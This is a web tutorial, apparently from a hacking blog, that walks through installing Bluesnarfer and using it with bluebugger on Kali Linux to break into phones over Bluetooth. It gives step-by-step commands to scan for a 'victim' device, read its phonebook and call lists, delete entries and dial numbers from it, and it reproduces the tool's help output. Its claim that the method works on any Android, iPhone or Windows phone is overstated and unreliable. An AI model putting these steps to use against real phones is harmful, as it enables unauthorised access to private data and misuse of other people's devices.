How To Hack Phones Bluetooth With Kali Linux And Backtrack

Do you want to learn how to hack a phone via Bluetooth using Kali Linux? The you have come to the right place. In this tutorial we will teach you how to hack any phone, whether it be Android, iPhone or Windows based phone using the power of Kali Linux aka backtrack and exploiting the Bluetooth connection of the phone itself.

 

Step 1. Install Bluesnarfer to your Linux machine using the CMD.

Open the opt directory

 

Make your way to the opt directory:

cd /opt

Download Bluesnarfer using wget

/opt# wget http://alighieri.org/tools/bluesnarfer.tar.gz

Open the directory again using the ls command and see if Bluesnarfer is there, then extract it.

:/opt# ls

bluesnarfer.tar.gz  firmware-mod-kit  metasploit  Teeth

To extract you will need to use the tar xvf command

/opt# tar xvf bluesnarfer.tar.gz

open the directory again with ls to see bluesnarfer there.

/opt# ls

BFi13-dev-18  bluesnarfer.tar.gz  metasploit

bluesnarfer   firmware-mod-kit    Teeth

Open the directory bluesnarfer created

/opt# cd bluesnarfer

/opt/bluesnarfer# ls

include  Makefile  README  src

Finish it off by compiling the install:

/opt/bluesnarfer# make

 

To see  the Bluesnarfer commands run: ./bluesnarfer

 :/opt/bluesnarfer# ./bluesnarfer

 

 

Step 2: Now that Bluesnarfer is installed, configure rfcomm.

 mkdir -p /dev/bluetooth/rfcomm

mknod -m 666 /dev/bluetooth/rfcomm/0 c 216 0

mknod –mode=666 /dev/rfcomm0 c 216 0

hciconfig -i hci0 up

hciconfig hci0

Now to scan for potential vulnerabilities:

hcitool scan hci0

Ping the victim to see if he is there:

 l2ping  < victim mac addr>

Browse the victim for rfcomm channels to connect to:

sdptool browse –tree –l2cap < mac addr >

Now Bluesnarfer is setup. Now you can access the victims phone to see texts, make phone calls etc.

Bluesnarfer -r 1-100 -C 7 -b < mac addr >

To see available commands:

bluebugger -h

To dial a number:

bluebugger -m < victim’s name > -c 7 -a < mac addr > Dial < number >

This is what the Bluesnarfer shell should look like:

 

bluesnarfer, version 0.1 –

usage: bluesnarfer [options] [ATCMD] -b bt_addr

 

ATCMD     : valid AT+CMD (GSM EXTENSION)

 

TYPE      : valid phonebook type ..

example   : “DC” (dialed call list)

“SM” (SIM phonebook)

“RC” (received call list)

“XX” much more

 

-b bdaddr : bluetooth device address

-C chan   : bluetooth rfcomm channel

 

-c ATCMD  : custom action

-r N-M    : read phonebook entry N to M

-w N-M    : delete phonebook entry N to M

-f name   : search “name” in phonebook address

-s TYPE   : select phonebook memory storage

-l      : list aviable phonebook memory storage

-i      : device info

 

You may also like...

Leave a Reply

Your email address will not be published. Required fields are marked *